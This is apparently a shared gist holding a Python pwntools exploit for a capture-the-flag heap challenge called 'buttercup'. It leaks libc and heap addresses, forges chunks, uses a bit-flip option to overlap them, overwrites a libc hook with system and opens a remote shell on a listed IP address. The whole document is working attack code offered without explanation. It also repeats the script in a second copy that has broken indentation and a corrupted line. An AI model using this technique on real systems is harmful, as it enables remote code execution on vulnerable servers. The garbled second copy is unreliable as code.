romanking98/exploit_butter.py Secret

## exploit_butter.py
#!/usr/bin/python
from pwn import *

libc = ELF("./libc.so.6")
p = remote("35.196.194.246", 8888)
#p = process("./buttercup",env={"LD_PRELOAD":"./libc.so.6"})
#raw_input()

def menu():
	p.recvuntil(">>")

def add_heap(idx,size):
	menu()
	p.sendline("1")
	p.recvuntil("of input")
	p.sendline(str(size))
	p.recvuntil("index")
	p.sendline(str(idx))

def edit(idx,buf):
	menu()
	p.sendline("3")
	p.recvuntil("index")
	p.sendline(str(idx))
	p.sendline(buf)

def delete(idx):
	menu()
	p.sendline("2")
	p.recvuntil("index")
	p.sendline(str(idx))

def flip(address):
	menu()
	p.sendline("1337")
	p.recvuntil("Address :")
	p.sendline(str(address))

# malloc unsorted bin first.
add_heap(0,200)
add_heap(1,200)

delete(0)
add_heap(0,200)

menu()
p.sendline("4")
p.recvuntil("0 => ")
leak = p.recv(6)
leak += "\x00"*2
leak = u64(leak) - 0x3c4b78
print hex(leak)

add_heap(2,24)
add_heap(3,24)

delete(2)
delete(3)

add_heap(2,24)
add_heap(3,24)

menu()
p.sendline("4")
p.recvuntil("2 => ")
heap = p.recvline().strip("\n")
heap += "\x00"*2
heap = u64(heap) - 0x2a0
print hex(heap)

menu()
p.sendline("5")
name = p64(0x00)
name += p64(0x1c1)
name += p64(heap + 0x30)
name += p64(heap + 0x30)
name += p64(0x00)
name += p64(0x00)
name += p64(heap+0x10)
name += p64(heap+0x10)
p.sendline(name)

buf = "X"*192
buf += p64(0x1c0)
edit(0,buf)

flip(heap+0x1d8)

delete(1)

add_heap(0,400)
finale = "X"*6*16
finale += p64(leak + 0x3c67a8)

edit(0,finale)

fin = p64(libc.symbols['system'] + leak)
edit(0,fin)

edit(3,"sh")

delete(3)

p.interactive()
	#!/usr/bin/python
	from pwn import *

	libc = ELF("./libc.so.6")
	p = remote("35.196.194.246", 8888)
	#p = process("./buttercup",env={"LD_PRELOAD":"./libc.so.6"})
	#raw_input()

	def menu():
	p.recvuntil(">>")

	def add_heap(idx,size):
	menu()
	p.sendline("1")
	p.recvuntil("of input")
	p.sendline(str(size))
	p.recvuntil("index")
	p.sendline(str(idx))

	def edit(idx,buf):
	menu()
	p.sendline("3")
	p.recvuntil("index")
	p.sendline(str(idx))
	p.sendline(buf)

	def delete(idx):
	menu()
	p.sendline("2")
	p.recvuntil("index")
	p.sendline(str(idx))

	def flip(address):
	menu()
	p.sendline("1337")
	p.recvuntil("Address :")
	p.sendline(str(address))

	# malloc unsorted bin first.
	add_heap(0,200)
	add_heap(1,200)

	delete(0)
	add_heap(0,200)

	menu()
	p.sendline("4")
	p.recvuntil("0 => ")
	leak = p.recv(6)
	leak += "\x00"*2
	leak = u64(leak) - 0x3c4b78
	print hex(leak)

	add_heap(2,24)
	add_heap(3,24)

	delete(2)
	delete(3)

	add_heap(2,24)
	add_heap(3,24)

	menu()
	p.sendline("4")
	p.recvuntil("2 => ")
	heap = p.recvline().strip("\n")
	heap += "\x00"*2
	heap = u64(heap) - 0x2a0
	print hex(heap)

	menu()
	p.sendline("5")
	name = p64(0x00)
	name += p64(0x1c1)
	name += p64(heap + 0x30)
	name += p64(heap + 0x30)
	name += p64(0x00)
	name += p64(0x00)
	name += p64(heap+0x10)
	name += p64(heap+0x10)
	p.sendline(name)

	buf = "X"*192
	buf += p64(0x1c0)
	edit(0,buf)

	flip(heap+0x1d8)

	delete(1)

	add_heap(0,400)
	finale = "X"616
	finale += p64(leak + 0x3c67a8)

	edit(0,finale)

	fin = p64(libc.symbols['system'] + leak)
	edit(0,fin)

	edit(3,"sh")

	delete(3)

	p.interactive()